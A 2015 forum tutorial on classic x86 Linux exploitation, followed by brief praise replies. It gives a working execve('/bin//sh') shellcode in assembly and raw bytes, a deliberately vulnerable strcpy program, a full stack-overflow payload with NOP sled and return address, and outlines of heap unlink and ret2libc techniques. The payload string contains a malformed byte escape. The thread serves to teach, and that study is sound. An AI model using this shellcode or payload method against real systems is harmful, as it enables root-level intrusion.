An introduction to software exploitation

09-29-2015, 08:55 PM #1

Specter

I highly recommend you learn Intel x86 Assembly before going through this thread, or you'll be lost. I have a separate thread on it. I also recommend you get at least some familiarity with the hexadecimal (base 16) number system. By the end of this thread you'll nearly forget the decimal system exists, that's how much binary data and memory addresses we'll be dealing with.

Preface: Most of what you'll find in this thread won't work against modern software or operating systems, but it is essential that you understand the fundamentals of exploitation. Why? Modern exploitation is more difficult and complex than it used to be, but the principles remain the same; it just takes more steps to get code execution.

To start off, if you're new to exploitation you might not understand what the above means. Why is exploitation harder today? Developers realized that bugs will always be present: before, now, and forever. So instead of only trying to fix bugs, they shifted to making the exploits that rely on those bugs harder to pull off. Exploits are also different from vulnerabilities, and I'd like to clear this up now. Vulnerabilities are bugs in programs that can potentially be used for exploitation. Exploits are the actual payloads crafted to gain code execution through those bugs. The main ways developers block exploits are mitigations such as DEP (Data Execution Prevention) and ASLR (Address Space Layout Randomization). We'll talk about these later, along with how DEP can be bypassed.

If you want to work through the code examples, I recommend using a wargame VM or Damn Vulnerable Linux, as it should have Data Execution Prevention and Address Space Layout Randomization turned off.

Shell and shellcode: Generally through exploitation you don't just want to print some pretty text, you want to invoke a shell. Why? An extreme example would be something like the PS3. If you can exploit a program on it, you can gain shell access. Even better, the shell you invoke will have the same privileges as the program you invoked it from, so if the program is running as root (uid 0) and you manage to exploit it, you just gained root access to the system.

Generally speaking, injected shellcode is mostly obsolete now due to Data Execution Prevention (DEP), but I'll still cover it because it can still work wherever DEP is off, and it can be used in wargames and competitions as well. These shellcode payloads are written in Intel x86 Assembly, which is exactly why I put the notice up top saying you want some sort of background with assembly. When it comes to exploitation, you want your payload to be as small as possible. Even if the buffer you need to fill is 64 bytes and gives you plenty of room, a smaller payload gives you more leeway, because it leaves more space for your NOP sled (we'll talk about this shortly as well).

There are tons of shellcode payloads all over the internet, but I recommend you study the code below to actually understand how it works. Because we want our payload to be small, we can't just compile a C program that calls execve() on "/bin/sh" and insert that; the payload would be huge and wouldn't work. You may compile a program and think "wow, 141 KB, that's small!". Well, we're going to invoke a shell in just 29 bytes. You could get this even lower, down to 23 bytes if you want, but I'll just be providing my payload. It's not perfect but it works.

The Steps

*. First we need to realize that in order to invoke the shell we need to make a syscall, specifically syscall 11 (execve on 32-bit x86 Linux). Syscalls are special, as they take their arguments in registers rather than on the stack. The syscall number always goes in the eax general purpose register, and the arguments go in ebx, ecx, and edx, in that order.

1. We need to clear out all the registers. You could probably get away with not clearing all of them, but to be safe we will. One little snag though that I'll briefly cover: we cannot simply use an instruction like "mov eax, 0", because it assembles to machine code that contains null bytes (0x00); you can try it and see for yourself. We cannot have null bytes in our payload. If you know C, you'll most likely know that a null terminator signifies the end of a string, so a string function such as strcpy stops copying at the first null byte. Everything after it never reaches the target buffer, and the truncated payload won't work, if it doesn't segfault outright. XORing a register with itself zeroes it without any null bytes.

2. We need to move 11 decimal, or 0xB, into the eax register (since we're calling syscall 11). We can't just "mov eax, 11" either, because the 32-bit immediate is padded with null bytes. Instead, we will move 11 into the lowest byte of the eax register, meaning we'll move it into al ("a" lower).

3. We're going to push ebx onto the stack. ebx is zero at this point, so this puts four null bytes on the stack that will terminate the string we push next.

4. Now we need the string "/bin/sh" for the first argument, since that's the program we're calling. We can't reliably store this in the data section, fixed addresses are bad. To get around this, we will push the ASCII representation of it onto the stack. Now you're most likely using a little endian machine (if you don't know what this means, refer to my assembly thread), so multi-byte values such as addresses are stored in memory in reverse order: the least significant byte sits at the lowest address and the most significant byte at the highest. This also applies to the values we push for "/bin/sh". Another problem you'll see is that each push is 4 bytes, but "/bin/sh" is only 7 bytes, and we need 8. Luckily, we can just add another "/" in there to make it 8 and it will still work fine. This will make our string "/bin//sh". We will push this in this exact order: 0x68732f2f (which reads "hs//" as written, but is stored in memory as "//sh"), then 0x6e69622f ("nib/" as written, stored as "/bin"). Written out, the constants spell "hs//nib/", which is "/bin//sh" reversed, but because the stack grows downward and each value is stored little endian, the bytes in memory starting at esp read "/bin//sh", followed by the zero we pushed in step 3.

5. Now we will move esp (the stack pointer) into ebx. Why? The stack pointer currently points at our string, "/bin//sh", and ebx holds the first argument for our syscall.

6. We push ecx and then ebx onto the stack. ecx is still zero, so this builds a two-entry argv array in memory: a pointer to our string followed by a NULL terminator.

7. Move the stack pointer into the ecx register, so ecx points at that argv array (the second argument). edx is still zero, which gives execve a NULL third argument (envp).

8. Finally we trigger interrupt 0x80 to make our syscall.

It may seem like a lot, but it's not. We now have invoked a shell in 8 easy steps.
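To make the null byte problem from steps 1 and 2 concrete, here is a small Python sketch. It only compares the standard 32-bit encodings of the four instructions mentioned above and models a C string copy by cutting at the first 0x00. The helper names (`has_null_byte`, `copied_by_strcpy`) are made up for this illustration, and the copy model is a simplification, not the real strcpy.

```python
# Encodings of the instructions from steps 1 and 2 (32-bit x86).
ENCODINGS = {
    "mov eax, 0":   bytes.fromhex("b800000000"),
    "xor eax, eax": bytes.fromhex("31c0"),
    "mov eax, 11":  bytes.fromhex("b80b000000"),
    "mov al, 11":   bytes.fromhex("b00b"),
}


def has_null_byte(code: bytes) -> bool:
    """True if the machine code contains a 0x00 byte."""
    return b"\x00" in code


def copied_by_strcpy(payload: bytes) -> bytes:
    """Simplified model of a C string copy: keep what comes before the first 0x00."""
    return payload.split(b"\x00", 1)[0]


if __name__ == "__main__":
    for text, code in ENCODINGS.items():
        print(f"{text:<14} {code.hex(' '):<16} null byte: {has_null_byte(code)}")

    # A payload starting with "mov eax, 11" is cut off after two bytes.
    truncated = copied_by_strcpy(ENCODINGS["mov eax, 11"] + b"\xcd\x80")
    print("bytes that survive the copy:", truncated.hex(" "))
```

Both "mov" forms with a 32-bit immediate carry null bytes, while the "xor" and "mov al" forms do not, which is why the shellcode uses the latter.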

The ASM

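    section .text
    global _start
    _start:
        xor eax, eax        ; zero the registers without encoding null bytes
        xor ebx, ebx
        xor ecx, ecx
        xor edx, edx        ; edx = 0 is the third argument (envp = NULL)
        mov al, 11          ; syscall number 11 (execve) in the low byte of eax
        push ebx            ; four zero bytes: terminator for the string
        push 0x68732f2f     ; "//sh" in memory
        push 0x6e69622f     ; "/bin" in memory
        mov ebx, esp        ; ebx -> "/bin//sh" (first argument)
        push ecx            ; NULL entry that ends the argv array
        push ebx            ; argv[0] = pointer to the string
        mov ecx, esp        ; ecx -> argv array (second argument)
        int 0x80            ; make the syscall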
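If the push order in the listing above looks backwards, this Python sketch may help. It models the stack as a byte string whose first byte is wherever esp points, and stores each 32-bit push little endian at the front. `ToyStack` and `string_at_esp` are hypothetical names for this illustration; nothing here executes machine code.

```python
import struct


class ToyStack:
    """Downward-growing stack; index 0 of `memory` is the byte esp points at."""

    def __init__(self) -> None:
        self.memory = b""

    def push(self, value: int) -> None:
        # A 32-bit push stores the value little endian at the new, lower esp.
        self.memory = struct.pack("<I", value) + self.memory


def string_at_esp(stack: ToyStack) -> bytes:
    """Read a C string starting at esp, i.e. up to the first zero byte."""
    return stack.memory.split(b"\x00", 1)[0]


stack = ToyStack()
stack.push(0)            # push ebx (ebx is zero): string terminator
stack.push(0x68732F2F)   # stored as the bytes "//sh"
stack.push(0x6E69622F)   # stored as the bytes "/bin"

if __name__ == "__main__":
    print(string_at_esp(stack))
```

The last value pushed ends up at the lowest address, so the string reads forwards in memory even though the constants look reversed in the source.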

Well we can't just insert these instructions into the stack and expect it to work... or can we? All we need to do is assemble this with nasm using "nasm -f elf [filename].asm", then run "objdump -d [filename].o" on the resulting object file. This will give us the machine code bytes of our shellcode. We're now ready to build our payload. Below are the bytes of the above shellcode:

    31 c0
    31 db
    31 c9
    31 d2
    b0 0b
    53
    68 2f 2f 73 68
    68 2f 62 69 6e
    89 e3
    51
    53
    89 e1
    cd 80
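As a quick sanity check on the dump above, this Python sketch parses the hex bytes, counts them, and confirms none of them is a null byte. The 64 byte buffer size is taken from the example program later in the thread; the variable names are just for illustration.

```python
# The objdump bytes from the listing above, one instruction per line.
DUMP = """
31 c0
31 db
31 c9
31 d2
b0 0b
53
68 2f 2f 73 68
68 2f 62 69 6e
89 e3
51
53
89 e1
cd 80
"""

# Strip all whitespace before parsing so this works on any Python 3 version.
shellcode = bytes.fromhex("".join(DUMP.split()))

BUFFER_SIZE = 64  # size of the buffer in the example program
padding_needed = BUFFER_SIZE - len(shellcode)

if __name__ == "__main__":
    print("length:", len(shellcode))
    print("contains null byte:", b"\x00" in shellcode)
    print("bytes left in the buffer:", padding_needed)
```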

Buffer Overflows: Ok, now let's say we were exploiting the following C program:

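    #include <stdio.h>
    #include <string.h>   /* declares strcpy */

    int main(int argc, char **argv)
    {
          char buff[64];
          /* Deliberately vulnerable: strcpy does no bounds checking, so an
             argv[1] longer than 63 characters writes past the end of buff. */
          strcpy(buff, argv[1]);
          return 0;
    }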

So we have a 64 byte buffer that we need to overflow, however we also need to overwrite the saved return address so that EIP (the instruction pointer) ends up pointing at our payload, or it won't execute. Generally speaking (it can vary, so your best bet is using GDB to find your exact offsets), past the end of the buffer you'll overwrite 4 bytes of garbage (the saved ebp), and the next 4 bytes are the return address that gets loaded into the instruction pointer. If you get "Illegal Instruction" or "Segmentation Fault", you're pointing to a bad memory address and need to change your payload. To actually create and load this payload, we'll use perl (yay).

First, we know our payload is 29 bytes. We need to fill a 64 byte buffer to overflow it. So, if you wanted to be a perfectionist, you could insert garbage bytes for the first 64 - 29 = 35 bytes. If you want your payload to have a better chance of working and couldn't care less about perfection, you're going to add a NOP sled. The NOP instruction exchanges (xchg) eax with eax, so it essentially does nothing, as the name implies. The good thing about this instruction is that if we land our EIP on any of these NOPs, even if it's not our shellcode's first instruction, we're golden: execution slides through them into the shellcode. If we pad with garbage instead, we have to hit the first instruction on the dot. A NOP is the single byte 0x90. We will put 35 NOPs, our shellcode, 4 bytes of trash, and a return address into our payload.

Now, for tutorial's sake, I'm going to say I went into gdb and found one of my NOPs at 0x080482AA (basic debugging can be found at the end of the thread). We are working with little endian, meaning we have to store the bytes of this address in reverse order. In the end, the payload we construct will be (\x is an escape sequence for writing a byte in hex):

    \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x0b\x53\x68\x\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x53\x89\xe1\xcd\x80\x41\x41\x41\x41\xaa\x82\x04\x08

Congratulations, if everything worked out, you now have a shell running off the program you exploited, with the same permissions as the program had.
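To double-check the layout of the payload above (sled, shellcode, 4 filler bytes, return address), here is a rough Python sketch of the arithmetic. It assumes the 64 byte buffer and 4 byte saved ebp described earlier, which can differ on a real build, and it uses a 29 byte stand-in of 0xCC bytes instead of the real shellcode. `build_layout` is a hypothetical helper, not a tool from this thread.

```python
import struct

BUFFER_SIZE = 64      # size of buff in the example program
SAVED_EBP_SIZE = 4    # assumed gap between the buffer and the return address


def build_layout(shellcode: bytes, landing_address: int) -> bytes:
    """Assemble sled + shellcode + filler + little-endian return address."""
    if len(shellcode) > BUFFER_SIZE:
        raise ValueError("shellcode does not fit in the buffer")
    sled = b"\x90" * (BUFFER_SIZE - len(shellcode))        # NOP sled
    filler = b"A" * SAVED_EBP_SIZE                         # lands on saved ebp
    return_address = struct.pack("<I", landing_address)    # reversed byte order
    payload = sled + shellcode + filler + return_address
    if b"\x00" in payload:
        raise ValueError("a null byte would cut the string copy short")
    return payload


# Stand-in bytes with the same length as the real shellcode (assumption).
stand_in = b"\xcc" * 29
payload = build_layout(stand_in, 0x080482AA)

if __name__ == "__main__":
    print("sled length:", BUFFER_SIZE - len(stand_in))
    print("total length:", len(payload))
    print("return address bytes:", payload[-4:].hex(" "))
```

The address check matters in practice too: any landing address that contains a 0x00 byte cannot be delivered through a string copy.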

Heap Overflows: Heap overflows are more complex than stack overflows, because the stack can easily be manipulated directly by the program, while with the heap it's not such an easy process. They are also harder for developers to spot, so in the real world you'll have a much better bet finding heap overflows than stack overflows; developers are becoming wise to the latter. Unlike the stack section, I'm not going to go into a complete tutorial on how to exploit it, but I will say this: the heap holds dynamically allocated memory, which is what the program gets when the programmer calls an allocation function such as malloc(). This hands chunks of memory to the program for usage. However, asking the operating system for more memory through a syscall (brk) is very slow, so good (most) allocators do tons of optimization, one of which is that if the program requests 256 bytes and there's a free 256 byte chunk (or two free 128 byte chunks), the allocator will reuse it instead of requesting more memory from the operating system. Heap overflows work by overflowing the current chunk with a payload (except if DEP is enabled, then you'd have to use ret2libc) and precisely overwriting the metadata of the next chunk. Each chunk has metadata saying 1. whether it's available, 2. its size, 3. a pointer to the previous free chunk, and 4. a pointer to the next free chunk (think of this as a linked list). We need to overwrite "availability" and "size" with garbage to get to the pointers. Once we get to the pointers, you can go about this in multiple ways. You can target an entry in the GOT (Global Offset Table) or a return address; the location of that entry is what you write to the "previous free" pointer. Into the "next free" pointer you write the address you want called through the Global Offset Table, or the address you want the return address to become. Complicated; as I said, I won't be covering heap overflows here, maybe in another tutorial if it's requested.
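The pointer trick described above comes from how a chunk gets removed from the doubly linked free list. The following Python sketch is only a toy model of that idea: memory is a dict from address to value, the field offsets (`PREV_OFFSET`, `NEXT_OFFSET`) and all addresses are invented, and it is not how any particular allocator is implemented. It shows that an unlink which trusts a chunk's pointers turns corrupted metadata into a write to a chosen location.

```python
PREV_OFFSET = 8    # hypothetical offset of the "previous free" pointer
NEXT_OFFSET = 12   # hypothetical offset of the "next free" pointer


def make_free_list(addresses):
    """Build toy memory holding a doubly linked list of free chunks (0 = none)."""
    memory = {}
    for i, addr in enumerate(addresses):
        memory[addr + PREV_OFFSET] = addresses[i - 1] if i > 0 else 0
        memory[addr + NEXT_OFFSET] = addresses[i + 1] if i < len(addresses) - 1 else 0
    return memory


def unlink(memory, chunk):
    """Remove a chunk from the list, trusting whatever pointers it holds."""
    prev_chunk = memory[chunk + PREV_OFFSET]
    next_chunk = memory[chunk + NEXT_OFFSET]
    memory[prev_chunk + NEXT_OFFSET] = next_chunk   # prev->next = next
    memory[next_chunk + PREV_OFFSET] = prev_chunk   # next->prev = prev


A, B, C = 0x1000, 0x2000, 0x3000

# Normal case: unlinking B makes A and C point at each other.
honest = make_free_list([A, B, C])
unlink(honest, B)

# Corrupted case: B's pointers were overwritten by an overflow.
TARGET_SLOT = 0x5000   # stands in for a GOT entry or saved return address
NEW_VALUE = 0x6000     # stands in for the address we want stored there
corrupted = make_free_list([A, B, C])
corrupted[B + PREV_OFFSET] = TARGET_SLOT - NEXT_OFFSET
corrupted[B + NEXT_OFFSET] = NEW_VALUE
unlink(corrupted, B)

if __name__ == "__main__":
    print(hex(honest[A + NEXT_OFFSET]), hex(honest[C + PREV_OFFSET]))
    print(hex(corrupted[TARGET_SLOT]))
```

In this toy layout the "previous free" value has to be the target location minus `NEXT_OFFSET`, because the unlink writes to the "next" field of whatever it believes the previous chunk is.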

Protection Mechanisms: Developers started to realize that patching bugs one by one was a losing battle, so they decided to harden systems against exploitation instead. These mechanisms make everything above either much more difficult or impossible. We'll talk about two of these mechanisms:

DEP or Data Execution Prevention, also known as NX (no-execute). This nifty little feature makes the system distinguish between data and executable code where it otherwise would not have, meaning that our above method, where we inject shellcode into memory and jump to it, won't work. You'll most likely get a segfault. Modern Linux distros and Windows enable this by default, so unless you turn it off, it doesn't matter what program you're attempting to exploit: DEP will block shellcode execution. This is bypassed by calling code that is already in the process instead (ret2libc), with the help of the GOT or Global Offset Table, because (at least on Linux) libc is loaded into practically every C program regardless. If you can get the address of "execve", you can call it and pass it the address of "/bin/sh".
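As a rough mental model of what DEP changes, the Python sketch below treats memory as a list of regions with an "executable" flag and checks whether a jump target is allowed. The region names, addresses, and sizes are invented for illustration, and `check_jump` is a hypothetical helper; real enforcement happens in the CPU and OS page tables.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Region:
    name: str
    start: int
    size: int
    executable: bool

    def contains(self, address: int) -> bool:
        return self.start <= address < self.start + self.size


class ExecutionFault(Exception):
    """Stands in for the segfault you get on a bad jump."""


# Hypothetical 32-bit layout, made up for this example.
REGIONS = [
    Region("text", 0x08048000, 0x1000, executable=True),
    Region("libc", 0xB7E00000, 0x1A0000, executable=True),
    Region("stack", 0xBFFDF000, 0x21000, executable=False),
]


def check_jump(regions, address: int, dep_enabled: bool) -> str:
    """Return the region name if execution may continue at address."""
    for region in regions:
        if region.contains(address):
            if dep_enabled and not region.executable:
                raise ExecutionFault(f"{region.name} is not executable")
            return region.name
    raise ExecutionFault("address is not mapped")


if __name__ == "__main__":
    print(check_jump(REGIONS, 0xBFFFF000, dep_enabled=False))  # shellcode on stack
    print(check_jump(REGIONS, 0xB7E10000, dep_enabled=True))   # existing libc code
```

With the flag enforced, a jump into the stack faults while a jump into code that is already mapped as executable still goes through, which is the gap that the libc based approach relies on.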

ASLR or Address Space Layout Randomization. This is a true nightmare for those who wish to exploit a program. Basically, ASLR or DEP on its own is weak and easy to get around. DEP and ASLR combined are not fun for exploitation. This feature randomizes where things are loaded in memory, making guessing addresses impractical and our little GOT method useless. I'm not going to cover how to bypass ASLR in this tutorial, however it's only really effective on 64 bit systems, as 32 bit systems don't have enough entropy to make guessing too much of an issue.
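The entropy point can be put into numbers with a small Python sketch. It assumes every guess is independent (the layout is re-randomized on each attempt) and that all layouts are equally likely. The bit counts used in the loop (8 and 28) are purely illustrative assumptions, not measurements of any particular system.

```python
def expected_attempts(entropy_bits: int) -> int:
    """Mean number of independent guesses until one address guess is right."""
    return 2 ** entropy_bits


def success_probability(entropy_bits: int, attempts: int) -> float:
    """Chance that at least one of `attempts` independent guesses is right."""
    miss = 1 - 1 / 2 ** entropy_bits
    return 1 - miss ** attempts


if __name__ == "__main__":
    for bits in (8, 28):  # illustrative values only
        tries = expected_attempts(bits)
        print(f"{bits} bits: about {tries} guesses on average, "
              f"{success_probability(bits, 1000):.4f} chance within 1000 tries")
```

Every extra bit of randomness doubles the average number of guesses, so the difference between a handful of bits and a few dozen is the difference between seconds of guessing and guessing being impractical.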

Last edited by Specter ; 09-29-2015 at 09:57 PM.

09-29-2015, 08:57 PM #2

Scouse Power

You are on fire

09-29-2015, 08:59 PM #3

Joren

Another awesome, detailed tutorial.
Very nice work man!

09-30-2015, 09:22 PM #4

vRice

"I highly recommend you learn Intel x86 Assembly before going through this thread"

aaaaand I'm leaving, skimmed it though and it seems useful to some people... not me, but some people haha

10-01-2015, 08:12 AM #5

Hash847

good job

04-19-2020, 07:22 AM #6

Seth_Black

I Love You <3